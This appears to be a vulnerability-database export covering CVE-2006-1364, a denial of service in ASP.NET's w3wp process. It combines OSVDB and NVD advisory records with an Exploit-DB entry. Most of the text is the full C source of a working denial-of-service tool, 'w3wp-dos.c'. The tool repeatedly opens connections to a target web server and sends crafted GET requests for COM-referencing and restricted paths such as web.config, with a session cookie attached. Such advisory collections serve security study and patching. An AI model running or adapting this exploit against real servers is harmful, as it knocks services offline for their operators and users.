{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1015825\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1421.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0451.html\nISS X-Force ID: 25392\nGeneric Exploit URL: http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1601\nGeneric Exploit URL: http://www.securiteam.com/windowsntfocus/5KP0O0KI0Y.html\n[CVE-2006-1364](https://vulners.com/cve/CVE-2006-1364)\nBugtraq ID: 17188\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:30402", "modified": "2006-03-22T14:25:54", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-04-28T13:20:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1364"]}, {"type": "exploitdb", "idList": ["EDB-ID:1601"]}], "modified": "2017-04-28T13:20:26", "rev": 2}, "vulnersScore": 6.5}, "id": "OSVDB:30402", "title": "Microsoft w3wp Crafted COM Component Request DoS", "edition": 1, "published": "2006-03-22T14:25:54", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "cvelist": ["CVE-2006-1364"], "lastseen": "2017-04-28T13:20:26"}

{"cve": [{"lastseen": "2021-02-02T05:27:19", "description": "Microsoft w3wp (aka w3wp.exe) does not properly handle when the AspCompat directive is not used when referencing COM components in ASP.NET, which allows remote attackers to cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or are restricted documents located under the ASP.NET application path.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2006-03-23T11:06:00", "title": "CVE-2006-1364", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1364"], "modified": "2018-10-18T16:32:00", "cpe": ["cpe:/a:microsoft:asp.net:1.1"], "id": "CVE-2006-1364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:asp.net:1.1:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:asp.net:1.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T14:31:41", "description": "ASP.NET w3wp (COM Components) Remote Crash Exploit. CVE-2006-1364. Dos exploit for windows platform", "published": "2006-03-22T00:00:00", "type": "exploitdb", "title": "ASP.NET w3wp COM Components Remote Crash Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1364"], "modified": "2006-03-22T00:00:00", "id": "EDB-ID:1601", "href": "https://www.exploit-db.com/exploits/1601/", "sourceData": "// w3wp-dos.c\n//\n\n#include \"stdafx.h\"\n\n#pragma comment (lib,\"ws2_32\")\n\n#include <winsock2.h>\n#include <windows.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n#include <stdio.h>\n#include <ctype.h>\n\nchar * pszUnauthLinks(DWORD);\n\n#define portno\t80\n\nint main(int argc, CHAR* argv[])\n{\n\tchar\tszWorkBuff[100];\n\tDWORD\tdwCount = 0, dwCounter;\n\tint\tiCnt = 0, iCount = 0;\n\n\tSOCKET\tconn_socket; \n\tWSADATA wsaData;\n\tstruct\tsockaddr_in sin;\n\tstruct\thostent *phostent;\n\tchar\t*pszTargetHost = new char[MAX_PATH]; \n\tUINT\tuAddr; \n\n\tif (argc<2)\n\t{\n\t\tprintf(\"============================================\\n\");\n\t\tprintf(\"\\t\\t w3wp-dos by Debasis Mohanty\\n\");\n\t\tprintf(\"\\t\\t www.hackingspirits.com\\n\");\n\t\tprintf(\"============================================\\n\");\n\n\t\tprintf(\"\\nUsage: w3wpdos <HostIP / HostName> \\n\\n\");\n\n\t\texit(0);\n\t}\n\n\tint iRetval; \n\tif((iRetval = WSAStartup(0x202,&wsaData)) != 0) {\n\t\tprintf( \"WSAStartup failed with error %d\\n\",iRetval);\n\t\tWSACleanup(); exit(1); }\n\n\t// Make a check on the length of the parameter provided\n\tif (strlen(argv[1]) > MAX_PATH)\t{ \n\t\tprintf( \"Too long parameter ....\\n\"); exit(1); }\n\telse\n\t\tstrcpy(pszTargetHost, argv[1]);\n\n\t// Resolve the hostname into IP address or vice-versa\n\tif(isalpha(pszTargetHost[0])) \n\t\tphostent = gethostbyname(pszTargetHost);\n\telse { \n\t\tuAddr = inet_addr(pszTargetHost);\n\t\tphostent = gethostbyaddr((char *)&uAddr,4,AF_INET);\n\n\t\tif(phostent != NULL)\n\t\t\twsprintf( pszTargetHost, \"[+] %s\", phostent->h_name);\n\t\telse\t{\n\t\t\tprintf( \"Failed to resolve IP address, please provide host name.\\n\" );\n\t\t\tWSACleanup();\n\t\t\texit(1);\t\n\t\t}\n\t}\n\n\tif (phostent == NULL )\t{\n\t\tprintf(\"Cannot resolve address [%s]: Error %d\\n\", pszTargetHost, \n\t\t\tWSAGetLastError());\n\n\t\tWSACleanup();\n\t\tprintf( \"Target host seems to be down or the program failed to resolve host name.\");\n\t\tprintf( \"Press enter to exit\" );\n\n\t\tgetchar();\n\t\texit(1); }\n\n\t// Initialise Socket info\n\tmemset(&sin,0,sizeof(sin));\n\tmemcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);\n\tsin.sin_family = phostent->h_addrtype;\n\tsin.sin_port = htons(portno);\n\n\tconn_socket = socket(AF_INET, SOCK_STREAM, 0); \n\tif (conn_socket < 0 )\t{\n\t\tprintf(\"Error Opening socket: Error %d\\n\", WSAGetLastError());\n\t\tWSACleanup();\n\n\t\treturn -1;}\n\n\tprintf(\"============================================\\n\");\n\tprintf(\"\\t\\t w3wp-dos by Debasis Mohanty\\n\");\n\tprintf(\"\\t\\t www.hackingspirits.com\\n\");\n\tprintf(\"============================================\\n\");\n\n\tprintf(\"[+] Host name: %s\\n\", pszTargetHost);\n\twsprintf( szWorkBuff, \"%u.%u.%u.%u\", \n\t\tsin.sin_addr.S_un.S_un_b.s_b1,\n\t\tsin.sin_addr.S_un.S_un_b.s_b2,\n\t\tsin.sin_addr.S_un.S_un_b.s_b3,\n\t\tsin.sin_addr.S_un.S_un_b.s_b4 );\n\tprintf(\"[+] Host IP: %s\\n\", szWorkBuff);\n\n\tclosesocket(conn_socket);\n\n\tprintf(\"[+] Ready to generate requests\\n\");\n\n\t/* The count should be modified depending upon the \n\tnumber of links in the szBuff array\t*/\n\twhile(dwCount++ < 10) \n\t{\t\t\t\t\t\t\n\n\t\tconn_socket = socket(AF_INET, SOCK_STREAM, 0);\n\t\tmemcpy(phostent->h_addr, (char *)&sin.sin_addr, phostent->h_length);\n\t\tsin.sin_family = AF_INET;\n\t\tsin.sin_port = htons(portno);\n\n\t\tif(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)\n\t\t\tperror(\"connect\");\n\n\t\tprintf( \"[%i] %s\", dwCount, pszUnauthLinks(dwCount));\n\t\tfor(dwCounter=1;dwCounter < 9;dwCounter++) \n\t\t{\n\t\t\tsend(conn_socket,pszUnauthLinks(dwCount), strlen(pszUnauthLinks(dwCount)),0);\n\n\t\t\tchar *szBuffer = new char[256];\n\t\t\trecv(conn_socket, szBuffer, 256, 0);\n\t\t\tprintf(\".\");\n\t\t\t// \t\t\tif( szBuffer != NULL) \n\t\t\t//\t\t\t\tprintf(\"%s\", szBuffer);\n\t\t\tdelete szBuffer;\n\t\t\tSleep(100);\n\t\t}\n\t\tprintf(\"\\n\");\n\t\tclosesocket(conn_socket);\n\t}\n\n\treturn 1;\n}\n\n\nchar * pszUnauthLinks( DWORD dwIndex )\n{\n\tchar\t*szBuff[10];\n\tTCHAR\t*szGetReqH = new char[1024]; \n\n\t/*\tModify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app path. \t*/\n\n\tszBuff[1] = \"GET /aspnet-app\\\\web.config\";\n\tszBuff[2] = \"GET /aspnet-app\\\\../aspnetlogs\\\\log1.logs\";\n\tszBuff[3] = \"GET /aspnet-app\\\\default-userscreen.aspx\";\n\tszBuff[4] = \"GET /aspnet-app\\\\users/config.aspx\";\n\tszBuff[5] = \"GET /aspnet-app\\\\links/anycomref.aspx\";\t//\n\tszBuff[6] = \"GET /aspnet-app\\\\com-ref-link1.aspx\";\t\t// Links of pages referring \n\tszBuff[7] = \"GET /aspnet-app\\\\com-ref-link2.aspx\";\t\t// COM components.\n\tszBuff[8] = \"GET /aspnet-app\\\\com-ref-link3.aspx\";\t\t//\n\tszBuff[9] = \"GET /aspnet-app\\\\com-ref-link4.aspx\";\t\t//\n\n\t/* Prepare the GET request for the desired link */\n\tstrcpy(szGetReqH, szBuff[dwIndex]);\n\tstrcat(szGetReqH, \" HTTP/1.1\\r\\n\");\n\tstrcat(szGetReqH, \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\");\n\tstrcat(szGetReqH, \"Accept-Language: en-us\\r\\n\");\n\tstrcat(szGetReqH, \"Accept-Encoding: gzip, deflate\\r\\n\");\n\tstrcat(szGetReqH, \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\\r\\n\");\n\tstrcat(szGetReqH, \"Host: \\r\\n\" );\n\tstrcat(szGetReqH, \"Connection: Keep-Alive\\r\\n\" );\n\n\t/* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */\n\tstrcat(szGetReqH, \"Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\\r\\n\" );\n\tstrcat(szGetReqH, \".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\\r\\n\\r\\n\" );\n\n\t// return szBuff[dwIndex];\n\treturn szGetReqH;\n}\n\n// milw0rm.com [2006-03-22]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1601/"}]}